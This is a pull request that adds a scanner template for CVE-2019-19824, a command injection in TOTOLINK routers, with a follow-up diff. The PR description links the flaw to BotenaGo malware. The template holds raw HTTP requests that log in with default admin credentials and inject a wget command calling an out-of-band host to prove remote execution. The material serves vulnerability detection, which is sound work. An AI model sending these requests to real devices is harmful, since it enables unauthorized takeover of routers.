### PR TITLE
Create CVE-2019-19824.yaml

### DIFF
--- a/cves/2019/CVE-2019-19824.yaml
+++ b/cves/2019/CVE-2019-19824.yaml
@@ -6,14 +6,15 @@ info:
   severity: high
   description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-19824
     - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html
-  tags: cve,cve2019,totolink,rce
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19824
+    - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2019-19824
     cwe-id: CWE-78
+  tags: cve,cve2019,totolink,rce,router
 
 requests:
   - raw:
@@ -24,7 +25,7 @@ requests:
         Accept: */*
         Content-Type: application/x-www-form-urlencoded
 
-        submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0& save_apply=Run+Command&sysCmd=wget http://{{interactsh-url}}
+        submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}
 
         POST /boafrm/formSysCmd HTTP/1.1
         Host: {{Hostname}}
@@ -32,7 +33,7 @@ requests:
         Accept: */*
         Content-Type: application/x-www-form-urlencoded
 
-        submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0& save_apply=Run+Command&sysCmd=wget http://{{interactsh-url}}
+        submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}
 
     matchers:
       - type: word

--- a/cves/2019/CVE-2019-19824.yaml
+++ b/cves/2019/CVE-2019-19824.yaml
@@ -1,0 +1,41 @@
+id: CVE-2019-19824
+
+info:
+  name: TOTOLINK  - Remote Code Execution
+  author: gy741
+  severity: high
+  description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19824
+    - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html
+  tags: cve,cve2019,totolink,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-19824
+    cwe-id: CWE-78
+
+requests:
+  - raw:
+      - |
+        POST /boafrm/formSysCmd HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic YWRtaW46cGFzc3dvcmQ=
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+
+        submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0& save_apply=Run+Command&sysCmd=wget http://{{interactsh-url}}
+
+        POST /boafrm/formSysCmd HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic YWRtaW46YWRtaW4=
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+
+        submit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0& save_apply=Run+Command&sysCmd=wget http://{{interactsh-url}}
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2019-19824

I'm analyzing the exploit code used by the BotenaGo malware. This CVE is being exploited by the corresponding malware.

```
On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.
```

- References: 
https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html
https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits

### Template Validation

I've validated this template locally?
- [ ] YES
- [X] NO